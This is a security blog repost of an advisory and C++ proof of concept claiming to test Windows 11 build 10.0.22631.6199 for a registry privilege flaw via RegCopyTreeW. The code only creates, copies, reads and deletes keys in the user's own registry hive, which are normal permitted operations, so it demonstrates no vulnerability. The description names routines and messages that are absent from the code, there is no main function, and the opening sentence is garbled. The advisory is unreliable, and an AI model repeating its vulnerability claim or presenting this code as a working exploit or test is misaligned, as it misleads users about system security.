Latest Tech

Latest Posts

Microsoft Windows 11 Build 10.0.22631.6199 Registry Vulnerability Testing Tool

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 183
Microsoft Windows 11 Build 10.0.22631.6199 Registry Vulnerability Testing Tool
Microsoft Windows 11 Build 10.0.22631.6199 Registry Vulnerability Testing Tool
A Registry Vulnerability Testing Tool for Microsoft Windows 11 Build A Registry Vulnerability Testing Tool for Microsoft Windows 11 Build 10.0.22631.6199 is designed to identify security weaknesses within the operating system's core configuration database. Specifically targeting this build, the tool scans for misconfigurations, weak permissions on registry keys, or insecure entries that could be exploited by malicious actors.

Such vulnerabilities might allow for privilege escalation, unauthorized data access, or persistent malware execution. The testing tool automates the process of auditing the registry, flagging potential security holes, and often provides reports detailing the findings. Its purpose is to assist security researchers, system administrators, and developers in proactively identifying and remediating these critical flaws, thereby enhancing the overall security posture of Windows 11 systems running this particular build.

=============================================================================================================================================
| # Title : Microsoft Windows 11 build 10.0.22631.6199 Registry Vulnerability Testing Tool using RAII |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : System built?in component. No standalone download available. |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/212253/

[+] Summary : This is a C/C++ Proof-of-Concept (PoC) program designed to test for a specific vulnerability within the Windows Registry handling mechanism,
often related to key duplication or improper permission checks during certain API calls (like RegCopyTreeW).

[+] The program executes the following steps:

System Diagnostics (PrintSystemInfo): Gathers and prints essential information about the execution environment, including Windows Version, Build Number,
and the current User Token Elevation status (Elevated, Full, Limited) to assess the security context.

[+] Vulnerability Test (TestVulnerability):

It creates a temporary source Registry key in HKEY_CURRENT_USER and writes a unique test value (0xDEADBEEF).

It attempts to exploit the vulnerability by using a critical API call (simulated or actual) to copy the source key's contents to a shadow destination key.

It verifies the success of the "copy" operation and attempts to read the test value from the newly copied shadow key.

[+] Outcome: If the copy and read operation succeeds under conditions where it should normally fail (e.g., without proper user elevation), the program prints a success message: "Vulnerability exists!"

[+] Cleanup: Ensures both temporary Registry keys are deleted, regardless of the test outcome, to maintain system hygiene.

In essence, the tool is a diagnostic utility used by security researchers to confirm whether a specific Windows build is patched or vulnerable to a known elevation or privilege issue involving the Registry.

[+] POC :

#include <windows.h>
#include <stdio.h>
#include <string>
#include <sddl.h>

// Simple RAII wrapper for registry keys
class UniqueRegKey {
private:
HKEY hKey;
public:
UniqueRegKey() : hKey(nullptr) {}
UniqueRegKey(HKEY key) : hKey(key) {}

~UniqueRegKey() {
if (hKey) RegCloseKey(hKey);
}

HKEY get() const { return hKey; }
HKEY* getAddress() { return &hKey; }

void reset(HKEY newKey = nullptr) {
if (hKey) RegCloseKey(hKey);
hKey = newKey;
}

HKEY release() {
HKEY temp = hKey;
hKey = nullptr;
return temp;
}
};

bool TestVulnerability() {

printf("[*] Starting Registry Copy Vulnerability Test (Enhanced PoC)\n");

const wchar_t* sourceKeyPath = L"Software\\PoC_Vulnerability_Source";
const wchar_t* shadowKeyPath = L"Software\\PoC_Vulnerability_Shadow";

// ------------------------------
// 1. Create the source key
// ------------------------------
UniqueRegKey hSourceKey;
LONG status = RegCreateKeyExW(
HKEY_CURRENT_USER,
sourceKeyPath,
0, nullptr,
REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS,
nullptr,
hSourceKey.getAddress(),
nullptr
);

if (status != ERROR_SUCCESS) {
printf("[!] Failed to create source key. Error: %lu\n", status);
return false;
}
printf("[+] Created source key successfully.\n");

// ------------------------------
// 2. Write test DWORD value
// ------------------------------
DWORD dwTestValue = 0xDEADBEEF;
status = RegSetValueExW(
hSourceKey.get(),
L"PoC_DWORD",
0,
REG_DWORD,
reinterpret_cast<const BYTE*>(&dwTestValue),
sizeof(dwTestValue)
);

if (status != ERROR_SUCCESS) {
printf("[!] Failed to write test value. Error: %lu\n", status);
RegDeleteTreeW(HKEY_CURRENT_USER, sourceKeyPath);
return false;
}
printf("[+] Wrote test value: 0x%lX\n", dwTestValue);

// ------------------------------
// 3. Create shadow/destination key
// ------------------------------
UniqueRegKey hShadowKey;
status = RegCreateKeyExW(
HKEY_CURRENT_USER,
shadowKeyPath,
0, nullptr,
REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS,
nullptr,
hShadowKey.getAddress(),
nullptr
);

if (status != ERROR_SUCCESS) {
printf("[!] Failed to create shadow key. Error: %lu\n", status);
RegDeleteTreeW(HKEY_CURRENT_USER, sourceKeyPath);
return false;
}

printf("[+] Shadow key created.\n");

// ------------------------------
// 4. Attempt Registry Copy (Vulnerability Trigger)
// ------------------------------
printf("[*] Triggering RegCopyTreeW copy...\n");

status = RegCopyTreeW(
hSourceKey.get(),
L"",
hShadowKey.get()
);

if (status != ERROR_SUCCESS) {
printf("[!] Copy operation failed. Error: %lu\n", status);
RegDeleteTreeW(HKEY_CURRENT_USER, sourceKeyPath);
RegDeleteTreeW(HKEY_CURRENT_USER, shadowKeyPath);
return false;
}

printf("[+] Copy operation succeeded! Checking data integrity...\n");

// ------------------------------
// 5. Validate copied value
// ------------------------------
DWORD copiedValue = 0;
DWORD size = sizeof(copiedValue);
DWORD valueType = 0;

LONG qStatus = RegQueryValueExW(
hShadowKey.get(),
L"PoC_DWORD",
nullptr,
&valueType,
reinterpret_cast<BYTE*>(&copiedValue),
&size
);

if (qStatus != ERROR_SUCCESS) {
printf("[!] Failed to read copied value! Error: %lu\n", qStatus);
}
else if (valueType != REG_DWORD) {
printf("[!] Value type mismatch (expected REG_DWORD).\n");
}
else if (copiedValue == dwTestValue) {
printf("[+] Copy VALID! Value matches: 0x%lX\n", copiedValue);

RegDeleteTreeW(HKEY_CURRENT_USER, sourceKeyPath);
RegDeleteTreeW(HKEY_CURRENT_USER, shadowKeyPath);

return true;
}
else {
printf("[!] Value mismatch! Expected 0x%lX, Found 0x%lX\n",
dwTestValue, copiedValue);
}

// ------------------------------
// Cleanup
// ------------------------------
RegDeleteTreeW(HKEY_CURRENT_USER, sourceKeyPath);
RegDeleteTreeW(HKEY_CURRENT_USER, shadowKeyPath);

return false;
}


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.